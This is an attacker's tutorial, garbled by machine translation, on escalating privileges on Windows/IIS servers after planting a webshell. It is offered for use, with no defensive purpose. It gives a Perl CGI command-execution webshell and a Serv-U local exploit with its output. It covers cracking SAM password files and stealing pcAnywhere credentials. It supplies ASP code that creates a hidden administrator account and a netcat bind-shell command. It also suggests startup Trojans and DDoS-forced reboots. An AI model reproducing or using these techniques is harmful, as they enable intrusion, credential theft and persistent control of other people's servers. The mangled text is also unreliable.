When we get a webshell, the next step is to improve the permissions.
My personal summary is as follows:
1: C: \ Documents ents and Settings \ All Users \ Application Data \ symantec \ pcAnywhere to see if they can jump to this directory. If the line is better, directly download its CIF file, get the pcAnywhere password and log on
2. c: \ winnt \ system32 \ config enter its Sam here to crack the user's password
The software used to crack the Sam password is LC, saminside.
3. c: \ Documents ents and Settings \ All Users \ Start Menu \ Program No, we can get a lot of useful information from here.
We can see a lot of shortcuts. We generally choose Serv-U, and then check the local properties. After knowing the path, we can see whether the page can jump.
After entering, if you have the permission to modify servudaemon. ini and add a user, the password is blank.
[User = wekwen | 1]
Password =
Homedir = C: timeout = 600
Maintenance = System
Access1 = C :\| rwamelcdp
Access1 = D :\| rwamelcdp
Access1 = f :\| rwamelcdp
Skeyvalues =
This user has the highest permission, and then we can go to quote site exec xxx over FTP to improve the permission.
4. c: \ winnt \ system32 \ inetsrv \ data is the Directory, which is also fully controlled by erveryone. All we need to do is upload the tool for permission escalation and execute
5. Check whether you can jump to the following directory.
C: \ PHP, with phpspy
C: \ prel. Sometimes it is not necessarily this directory (you can also view the attributes by downloading the shortcut ).
#! /Usr/bin/perl
Binmode (stdout );
Syswrite (stdout, "Content-Type: text/html \ r \ n", 27 );
$ _ = $ ENV {QUERY_STRING };
S/% 20 // ig;
S/% 2f // ig;
$ Execthis = $ _;
Syswrite (stdout, "<HTML> <PRE> \ r \ n", 13 );
Open (stderr, "> & stdout") | die "can't redirect stderr ";
System ($ execthis );
Syswrite (stdout, "\ r \ n </PRE> Close (stderr );
Close (stdout );
Exit;
Save as CGI for execution,
If not, try PL extension. Change the CGI file to the pl file and submit HTTP: // anyhost // cmd. pl? Dir
"Access Denied" is displayed, indicating that access is allowed! Submit now: Upload su.exe (Ser-u permission escalation tool) to the prel bin directory.
Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe
Return Value:
Serv-U> 3.x Local Exploit by Xiaolu
Usage: serv-u.exe "command"
Example: serv-u.exe "nc.exe-l-P 99-e cmd.exe"
Now it is IUSR permission, submit:
Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "cacls.exe C:/e/T/g everyone: F"
Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "cacls.exe D:/e/T/g everyone: F"
Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "cacls.exe E:/e/T/g everyone: F"
Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "cacls.exe F:/e/T/g everyone: F"
If the following information is returned, the operation is successful.
Serv-U> 3.x Local Exploit by Xiaolu
<220 Serv-u ftp server v5.2 for Winsock ready...
> User localadministrator
<331 user name Okay, need password.
**************************************** **************
> Pass # l @ $ AK #. lk; 0 @ P
<230 user logged in, proceed.
**************************************** **************
> Site maintenance
**************************************** **************
[+] Creating new domain...
<200-domainid = 2
<220 domain settings saved
**************************************** **************
[+] Domain XL: 2 created
[+] Creating edevil user
& Lt; 200-user = XL
200 user settings saved
**************************************** **************
[+] Now exploiting...
> User XL
<331 user name Okay, need password.
**************************************** **************
& Gt; pass 111111
<230 user logged in, proceed.
**************************************** **************
[+] Now executing: cacls.exe C:/e/T/g everyone: F
& Lt; 220 domain deleted
In this way, all partitions are fully controlled by everyone.
Now we promote our users to administrators:
Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "net localgroup administrators iusr_anyhost/Add"
6. You can run "cscript c: \ Inetpub \ adminscripts \ adsutil. vbs get w3svc/inprocessisapiapps" to improve permissions.
Use this cscript c: \ Inetpub \ adminscripts \ adsutil. vbs get w3svc/inprocessisapiapps
View the privileged DLL file: idq. dll httpext. dll httpodbc. dll ssinc. dll msw3prt. dll
Then add ASP. DLL to the privileged family.
ASP. dll is stored in c: \ winnt \ system32 \ inetsrv \ ASP. dll (the locations of different hosts are not necessarily the same)
Now we can add cscript adsutil. vbs set/w3svc/inprocessisapiapps "C: \ winnt \ system32 \ idq. DLL "" C: \ winnt \ system32 \ inetsrv \ httpext. DLL "" C: \ winnt \ system32 \ inetsrv \ httpodbc. DLL "" C: \ winnt \ system32 \ inetsrv \ ssinc. DLL "" C: \ winnt \ system32 \ msw3prt. DLL "" C: \ winnt \ system32 \ inetsrv \ ASP. DLL"
You can use cscript adsutil. vbs get/w3svc/inprocessisapiapps to check whether it is added.
7. You can also use this section Code Try to improve, as if the effect is not obvious
<% Response. expires = 0 "> % @ codePage = 936%> <% response. expires = 0
On Error resume next
Session. Timeout = 50
Server. scripttimeout = 3000
Set Lp = server. Createobject ("wscript. Network ")
Oz = "winnt: //" & LP. computername
Set Ob = GetObject (OZ)
Set OE = GetObject (OZ & "/administrators, group ")
Set OD = OB. Create ("user", "wekwen $ ")
OD. setpassword "wekwen" <----- Password
OD. setinfo
Set of = GetObject (OZ & "/wekwen $, user ")
Oe. Add (of. adspath)
Response. Write "wekwen $ super Account Created successfully! "%>
use this code to check whether the upgrade is successful
<% @ codePage = 936%>
<% response. expires = 0
on error resume next 'find the account in the Administrators group
set Tn = server. createobject ("wscript. network ")
set objgroup = GetObject (" winnt: // "& tn. computername & "/administrators, group")
for each admin in objgroup. members
response. write admin. name & "
"
next
If err then
response. write "No: wscript. network "
end if
%> 8.c:\ Program Files \ Java Web Start. If yes, It is very small. You can try JSP webshell. I have never heard of a small permission.
9. finally, if the host settings are abnormal, try writing bat, vbs, and other Trojans in the C: \ Documents ents and Settings \ All Users \ "start" Menu \ Program \ Start.
wait until the host is restarted or DDoS forces it to restart to improve the permission.